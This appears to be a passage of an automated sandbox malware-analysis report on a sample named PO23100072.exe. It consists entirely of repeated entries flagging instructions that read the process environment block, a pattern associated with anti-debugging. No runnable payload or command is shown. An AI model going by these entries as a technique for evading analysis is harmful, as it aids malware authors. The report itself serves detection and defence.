            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01824000 mov ecx, dword ptr fs:[00000030h]5_2_01824000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01842000 mov eax, dword ptr fs:[00000030h]5_2_01842000
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C0F0 mov eax, dword ptr fs:[00000030h]5_2_0179C0F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E20F0 mov ecx, dword ptr fs:[00000030h]5_2_017E20F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A80E9 mov eax, dword ptr fs:[00000030h]5_2_017A80E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0179A0E3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836030 mov eax, dword ptr fs:[00000030h]5_2_01836030
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826050 mov eax, dword ptr fs:[00000030h]5_2_01826050
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A208A mov eax, dword ptr fs:[00000030h]5_2_017A208A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018263C0 mov eax, dword ptr fs:[00000030h]5_2_018263C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185C3CD mov eax, dword ptr fs:[00000030h]5_2_0185C3CD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018443D4 mov eax, dword ptr fs:[00000030h]5_2_018443D4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018443D4 mov eax, dword ptr fs:[00000030h]5_2_018443D4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E3DB mov ecx, dword ptr fs:[00000030h]5_2_0184E3DB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E3DB mov eax, dword ptr fs:[00000030h]5_2_0184E3DB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C310 mov ecx, dword ptr fs:[00000030h]5_2_0179C310
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C0310 mov ecx, dword ptr fs:[00000030h]5_2_017C0310
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA30B mov eax, dword ptr fs:[00000030h]5_2_017DA30B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D63FF mov eax, dword ptr fs:[00000030h]5_2_017D63FF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE3F0 mov eax, dword ptr fs:[00000030h]5_2_017BE3F0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B03E9 mov eax, dword ptr fs:[00000030h]5_2_017B03E9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA3C0 mov eax, dword ptr fs:[00000030h]5_2_017AA3C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A83C0 mov eax, dword ptr fs:[00000030h]5_2_017A83C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01822349 mov eax, dword ptr fs:[00000030h]5_2_01822349
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A352 mov eax, dword ptr fs:[00000030h]5_2_0186A352
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01848350 mov ecx, dword ptr fs:[00000030h]5_2_01848350
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov ecx, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182035C mov eax, dword ptr fs:[00000030h]5_2_0182035C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798397 mov eax, dword ptr fs:[00000030h]5_2_01798397
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E388 mov eax, dword ptr fs:[00000030h]5_2_0179E388
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C438F mov eax, dword ptr fs:[00000030h]5_2_017C438F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C438F mov eax, dword ptr fs:[00000030h]5_2_017C438F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184437C mov eax, dword ptr fs:[00000030h]5_2_0184437C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01820283 mov eax, dword ptr fs:[00000030h]5_2_01820283
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179826B mov eax, dword ptr fs:[00000030h]5_2_0179826B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4260 mov eax, dword ptr fs:[00000030h]5_2_017A4260
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov ecx, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018362A0 mov eax, dword ptr fs:[00000030h]5_2_018362A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6259 mov eax, dword ptr fs:[00000030h]5_2_017A6259
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A250 mov eax, dword ptr fs:[00000030h]5_2_0179A250
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179823B mov eax, dword ptr fs:[00000030h]5_2_0179823B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01828243 mov eax, dword ptr fs:[00000030h]5_2_01828243
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01828243 mov ecx, dword ptr fs:[00000030h]5_2_01828243
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A250 mov eax, dword ptr fs:[00000030h]5_2_0185A250
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A250 mov eax, dword ptr fs:[00000030h]5_2_0185A250
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836500 mov eax, dword ptr fs:[00000030h]5_2_01836500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A25E0 mov eax, dword ptr fs:[00000030h]5_2_017A25E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A65D0 mov eax, dword ptr fs:[00000030h]5_2_017A65D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE59C mov eax, dword ptr fs:[00000030h]5_2_017DE59C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D4588 mov eax, dword ptr fs:[00000030h]5_2_017D4588
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2582 mov eax, dword ptr fs:[00000030h]5_2_017A2582
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2582 mov ecx, dword ptr fs:[00000030h]5_2_017A2582
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A49A mov eax, dword ptr fs:[00000030h]5_2_0185A49A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179645D mov eax, dword ptr fs:[00000030h]5_2_0179645D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C245A mov eax, dword ptr fs:[00000030h]5_2_017C245A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182A4B0 mov eax, dword ptr fs:[00000030h]5_2_0182A4B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA430 mov eax, dword ptr fs:[00000030h]5_2_017DA430
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C427 mov eax, dword ptr fs:[00000030h]5_2_0179C427
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A04E5 mov ecx, dword ptr fs:[00000030h]5_2_017A04E5
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D44B0 mov ecx, dword ptr fs:[00000030h]5_2_017D44B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A64AB mov eax, dword ptr fs:[00000030h]5_2_017A64AB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A456 mov eax, dword ptr fs:[00000030h]5_2_0185A456
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C460 mov ecx, dword ptr fs:[00000030h]5_2_0182C460
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8770 mov eax, dword ptr fs:[00000030h]5_2_017A8770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184678E mov eax, dword ptr fs:[00000030h]5_2_0184678E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
